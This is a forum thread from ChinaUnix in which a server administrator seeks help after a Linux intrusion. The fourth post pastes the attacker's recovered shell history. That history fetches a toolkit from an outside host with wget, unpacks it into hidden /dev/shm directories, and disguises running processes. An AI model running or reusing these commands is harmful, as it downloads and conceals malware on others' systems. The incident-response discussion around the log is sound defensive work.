免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
1234下一页
最近访问板块 发新帖
查看: 32713 | 回复: 31
打印 上一主题 下一主题

Linux服务器被入侵了。。。请求帮助 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-02-27 10:32 |只看该作者 |倒序浏览
系统是CentOS5.1

一个root组的用户的~/.bash_history被重定向到了/dev/null,该用户没有sudo权限
不知道还能在什么地方看出操作记录了
曾经在ps中看到过该用户的mldonkey在工作
kill掉了
在apache的log中看到很多ip访问网站下的.tmp/下的一些rmvb
apache下有该用户创建的.tmp目录,但是是空的
到现在仍然有很多用户通过http访问这个目录下的不存在的文件

密码过于简单,是123123,现在改了
查看了root的~/.bash_history没发现有什么问题
查看了/bin/ps
[root@localhost ~]# ls -l /bin/ps
-r-xr-xr-x 1 root root 79068 2008-05-25 /bin/ps

但是现在yum无法使用,执行总返回404

曾经发现cyrus用户登录过,并且执行了很占用资源的find进程,还有其他一些很奇怪的进程名字。也查找不到相应文件。后来该cyrus设置了密码。没见到再上线

root好像也很危险。
[root@localhost ~]# last | grep root
root     pts/1        221.223.79.215   Fri Feb 20 14:16 - 16:30  (02:13)
root     pts/1        172.131.64.71    Thu Feb 12 09:30 - 09:42  (00:11)
root     pts/1        85.112.3.165     Mon Jan 12 23:02 - 23:02  (00:00)
root     pts/1        123.117.226.7    Thu Dec 11 12:40 - 12:42  (00:02)
root     pts/0        221.223.121.123  Fri Nov 28 13:04 - 15:16  (02:11)
。。。。
221.223的应该是我们自己的,中间三行。。。

ps aux的列表贴出来不知道是否安全?

论坛徽章:
3
金牛座
日期:2014-06-14 22:04:062015年辞旧岁徽章
日期:2015-03-03 16:54:152015年迎新春徽章
日期:2015-03-04 09:49:45
2 [报告]
发表于 2009-02-27 10:34 |只看该作者

回复 #1 艾斯尼勒 的帖子

密码还是稍微复杂一点好啊

论坛徽章:
0
3 [报告]
发表于 2009-02-27 10:38 |只看该作者
没有负责安全的人员,我也不懂安全
所以安全措施都没有作

论坛徽章:
0
4 [报告]
发表于 2009-02-27 10:41 |只看该作者
啊。在cyrus目录中找到了.bash_history

[root@localhost imap]# cat .bash_history
w
uname -a
passwd
cat /proc/cpuinfo
cat /etc/hosts
ls -a
cd /dev/shm
lls -a
ls -a
mkdir " "
cd " "
wget
wget www.freewebtown.com/spionu/zH.tgz
ls -a
mkdir .m
ls -a
tar xvfz zH.tgz
rm -pfr zH.tgz
rm -fr zH.tgz
cd zH
ls -a
rm -fr vuln.txt
screen
./screen
ls -a
cd ..
ls -a
cd .m
ls -a
tar xvfz muh.tar.gz
ls -a
rm -fr muh.tar.gz m.ses
chmod +x *
PATH="." init
id
cd " "
cd /var/
cd /dev/shm
w
cd " "
ls -a
cd zH
ls -a
cat vuln.txt
screen -r
./screen -r

论坛徽章:
0
5 [报告]
发表于 2009-02-27 10:57 |只看该作者
我是不是必须得重装系统了啊?

论坛徽章:
1
寅虎
日期:2015-01-23 02:35:47
6 [报告]
发表于 2009-02-27 12:19 |只看该作者
被黑最好的方式就是重装,不过,安全措施都没有,这个东东还是得好好弄一下的好

论坛徽章:
0
7 [报告]
发表于 2009-02-27 13:02 |只看该作者
唉,主要是服务器在托管,重装很。。。那个

论坛徽章:
1
寅虎
日期:2015-01-23 02:35:47
8 [报告]
发表于 2009-02-27 13:05 |只看该作者
那你就好好的检查一下,把可能有的后门全关掉

论坛徽章:
3
金牛座
日期:2014-06-14 22:04:062015年辞旧岁徽章
日期:2015-03-03 16:54:152015年迎新春徽章
日期:2015-03-04 09:49:45
9 [报告]
发表于 2009-02-27 13:19 |只看该作者
原帖由 cuci 于 2009-2-27 12:19 发表
被黑最好的方式就是重装,不过,安全措施都没有,这个东东还是得好好弄一下的好


大猫兄这叫不怕黑

论坛徽章:
1
寅虎
日期:2015-01-23 02:35:47
10 [报告]
发表于 2009-02-27 13:26 |只看该作者
原帖由 dreamice 于 2009-2-27 13:19 发表


大猫兄这叫不怕黑



系统管理不是等系统出了问题才去管,肯定是先管好让它不出问题才是
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP